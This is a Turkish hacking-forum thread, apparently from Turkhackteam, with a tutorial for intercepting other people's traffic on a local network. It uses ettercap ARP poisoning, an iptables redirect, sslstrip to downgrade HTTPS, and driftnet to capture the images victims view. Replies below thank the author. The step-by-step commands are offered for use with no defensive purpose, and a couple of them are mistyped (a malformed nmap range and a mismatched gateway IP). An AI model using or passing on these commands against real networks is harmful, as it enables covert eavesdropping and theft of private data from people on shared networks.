[Videolu Anlatim] #Ettercap + Driftnet Kullanimi - llBraiNRoxieSll#

llBraiNRoxieSll

Kıdemli Üye
31 Ara 2015
2,369
2
(nowhere) in
Ettercap + Driftnet Kullanimi - llBraiNRoxieSll#

[ame]https://www.youtube.com/watch?v=9EMEm8_DKJc[/ame]

Kullandigim komutlar ve sozlu anlatim ;

Ilk olarak
Kod:
echo 1 > /proc/sys/net/ipv4/ip_forward
Kod:
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

Daha sonra yeni terminal acip etter.conf giris yapacagiz
Kod:
leafpad /etc/ettercap/etter.conf

ctrl+f kisayolunu kullanarak aradigimiz kelimeyi bulalim kelimemiz (iptables) onundeki # leri silelim.

Simdi ettercap girisi ve ayarlari
Kod:
ettercap -G

Videoyu izleyip detayli bir sekilde yaptiklarimi yapar iseniz bir sorun cikmayacaktir ettercap ayarlarinda hedef 1 ve 2 yi secelim bir sizin modeminiz 2 de hedef olur genellikle

Bir sonraki islemimiz yeni terminal acarak
Kod:
route -n
Komutu ile gateway ip mizi bulmak

Buldugumuz ip adresini benimki ornek olarak 192.126.2.1 di sonuna /24 ekleyerek devam edecegiz
Kod:
nmap -sn 192.168.2.1./24

Ettercap aracimiza girerek start sniffing diyelim daha sonra yeni terminal acarak komutunu girelim.
Kod:
sslstrip -l 8080

En son yacagimiz tek bir sey kaldi yeni bir terminal acarak / komutunu girmek bende eth0 kablo ile bagli oldugu icin sizde degisiklik gosterebilir soyle anlatayim ettercapde unified sniffing yaparken bende eth0 cikmisti sizde degisiklik gosterebilir.
Kod:
driftnet -i eth0
En son komutumuzu yazdiktan sonra artik gorsel almaya baslayabiliriz ama uyarida bulunmam gerekiyor ki bazi uygulamalarda ve telefonlara gore degisiklik gosterebiliyor yine de deneyebilirsiniz okudugunuz ve izlediginiz icin tesekkurler

-jaggu-

llBraiNRoxieSll

Kıdemli Üye
31 Ara 2015
2,369
2
(nowhere) in
Eline sağlık ||BraiNRoXieS||

eline sağlık dostum

Ellerine sağlık

Tesekkurler

Cεys;7901836' Alıntı:
Eline sağlık kardeşim :)
resimlerle de desteklemeni bekleriz :)

Tesekkurler dostlar :)

Eline sağlık gardaşım :)

Eyw abim benim :)

Elinize sağlık.

Tesekkur ederim :)

Ƴαĸαмoz1Յ1Գ;7903756' Alıntı:
Eline sağlık Brain, emek kokuyor :)

Tesekkur ederim abi daha iyileri gelecek suphen olmasin :)

Elinize Sağlık hocam yararlı konu.

Teşekkürler

Ellerine sağlık dostum ;)

Tesekkurler kardesim :RpS_laugh:

Moderatör tarafında düzenlendi:

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.